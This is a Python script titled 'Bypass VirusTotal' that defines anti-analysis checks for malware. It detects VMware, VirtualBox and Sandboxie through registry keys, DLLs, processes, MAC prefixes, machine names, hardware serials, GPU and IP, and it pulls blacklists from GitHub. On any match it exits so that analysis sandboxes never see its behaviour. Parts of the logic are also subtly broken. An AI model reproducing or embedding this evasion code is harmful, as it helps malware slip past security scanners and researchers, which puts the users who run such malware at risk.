kerpy.py - Bypass VirusTotal

1. import re
2. import uuid
3. import wmi
4. import requests
5. import os
6. import ctypes
7. import sys
8. import subprocess
9. import socket
10.  
11. def get_base_prefix_compat():
12.     return getattr(sys, "base_prefix", None) or getattr(sys, "real_prefix", None) or sys.prefix
13.  
14.  
15. def in_virtualenv():
16.     return get_base_prefix_compat() != sys.prefix
17.    
18. class Kerpy:
19.     def registry_check(self):
20.         cmd = "REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\"
21.         reg1 = subprocess.run(cmd + "DriverDesc", shell=True, stderr=subprocess.DEVNULL)
22.         reg2 = subprocess.run(cmd + "ProviderName", shell=True, stderr=subprocess.DEVNULL)
23.         if reg1.returncode == 0 and reg2.returncode == 0:
24.             print("VMware Registry Detected")
25.             sys.exit()
26.  
27.     def processes_and_files_check(self):
28.         vmware_dll = os.path.join(os.environ["SystemRoot"], "System32\\vmGuestLib.dll")
29.         virtualbox_dll = os.path.join(os.environ["SystemRoot"], "vboxmrxnp.dll")    
30.    
31.         process = os.popen('TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "="').read()
32.         processList = []
33.         for processNames in process.split(" "):
34.             if ".exe" in processNames:
35.                 processList.append(processNames.replace("K\n", "").replace("\n", ""))
36.  
37.         if "VMwareService.exe" in processList or "VMwareTray.exe" in processList:
38.             print("VMwareService.exe & VMwareTray.exe process are running")
39.             sys.exit()
40.                            
41.         if os.path.exists(vmware_dll):
42.             print("Vmware DLL Detected")
43.             sys.exit()
44.            
45.         if os.path.exists(virtualbox_dll):
46.             print("VirtualBox DLL Detected")
47.             sys.exit()
48.        
49.         try:
50.             sandboxie = ctypes.cdll.LoadLibrary("SbieDll.dll")
51.             print("Sandboxie DLL Detected")
52.             sys.exit()
53.         except:
54.             pass        
55.        
56.         processl = requests.get("https://raw.githubusercontent.com/Lawxsz/bypass-virus-total/main/utils/process.txt").text
57.         if processl in processList:
58.             sys.exit()
59.            
60.     def mac_check(self):
61.         mac_address = ':'.join(re.findall('..', '%012x' % uuid.getnode()))
62.         mac_list = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/mac_list.txt").text
63.         if mac_address[:8] in mac_list:
64.             print("VMware MAC Address Detected")
65.             sys.exit()
66.     def check_pc(self):
67.      vmname = os.getlogin()
68.      vm_name = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt").text
69.      if vmname in vm_name:
70.          sys.exit()
71.      vmusername = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt").text
72.      host_name = socket.gethostname()
73.      if host_name in vmusername:
74.          sys.exit()
75.     def hwid_vm(self):
76.      current_machine_id = str(subprocess.check_output('wmic csproduct get uuid'), 'utf-8').split('\n')[1].strip()
77.      hwid_vm = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/hwid_list.txt").text
78.      if current_machine_id in hwid_vm:
79.          sys.exit()
80.     def checkgpu(self):
81.      c = wmi.WMI()
82.      for gpu in c.Win32_DisplayConfiguration():
83.         GPUm = gpu.Description.strip()
84.      gpulist = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt").text
85.      if GPUm in gpulist:
86.          sys.exit()
87.     def check_ip(self):
88.      ip_list = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt").text
89.      reqip = requests.get("https://api.ipify.org/?format=json").json()
90.      ip = reqip["ip"]
91.      if ip in ip_list:
92.          sys.exit()
93.     def profiles():
94.      machine_guid = uuid.getnode()
95.      guid_pc = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txt").text
96.      bios_guid = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/BIOS_Serial_List.txt").text
97.      baseboard_guid = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/BaseBoard_Serial_List.txt").text
98.      serial_disk = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/DiskDrive_Serial_List.txt").text
99.      if machine_guid in guid_pc:
100.          sys.exit()
101.      w = wmi.WMI()
102.      for bios in w.Win32_BIOS():
103.       bios_check = bios.SerialNumber    
104.      if bios_check in bios_guid:
105.          sys.exit()
106.      for baseboard in w.Win32_BaseBoard():
107.          base_check = baseboard.SerialNumber
108.      if base_check in baseboard_guid:
109.          sys.exit()
110.      for disk in w.Win32_DiskDrive():
111.       disk_serial = disk.SerialNumber
112.      if disk_serial in serial_disk:
113.          sys.exit()